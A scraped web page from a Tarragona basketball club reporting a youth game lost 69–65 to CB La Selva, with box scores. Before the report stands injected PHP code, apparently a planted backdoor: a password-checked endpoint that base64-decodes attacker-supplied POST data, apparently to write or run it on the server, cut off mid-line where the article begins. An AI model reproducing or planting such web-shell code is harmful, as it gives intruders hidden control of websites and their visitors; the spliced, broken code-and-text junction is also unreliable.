function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La mala punteria frustra la remuntada de l'infantil masculí B - Tgn Bàsquet Club -

La mala punteria frustra la remuntada de l’infantil masculí B

Updated: octubre 5, 2013

Comenzaron el primer cuarto muy nerviosos los visitantes fallando canastas fáciles lo que permitió a los locales tomar distancia en el marcador. Segundo cuarto muy flojo por parte de los dos equipos. En el tercer cuarto pudimos ver un gran trabajo de los visitantes que dando mucha velocidad al juego consiguieron dar la vuelta al marcador. Sin embargo esto no tuvo continuación con el siguiente quinteto, lo que permitió que los locales volvieran a tomar ventaja en el marcador y alcanzaran su mayor diferencia (+12).

Tras el descanso, los visitantes retomaron el buen trabajo defensivo y poco a poco se fueron acercando en el marcador llegando a colocarse a falta de un minuto con solo 1 punto de diferencia en contra ( 66 – 65) y posesión de balon. Un par de imprecisiones en estos segundos decisivos y el desacierto en los tiros permitio a los locales salvar el partido y conseguir la victoria.

CB La Selva       69

TGN Basquet B  65

LA SELVA: Garcia (12), Fernandez, Balape (14), Mateu (18) y Quepy (15) – cinco inicial – Garrido (1) , Toppe (2), Galvan, Ayllon (7), Papis y Olle. 8 de 25 en tiros libres. 17 faltas.

TGN Basquet: Casino (19), Virgili P. (5), Torija (4), Brull (5) y Rubio (10) – cinco inicial – Vidal (10), Paris, Blasi (6), Mateu (2), Escalera (4) y Blade. 9 de 22 en tiros libres. 23 faltas.

Parciales: 14 – 5, 5 – 6, 2 – 12, 16 – 2 (37 – 25); 7 – 13. 9 – 6, 9 – 10, 7 – 11 (69 – 65).

Árbitro: Moron A.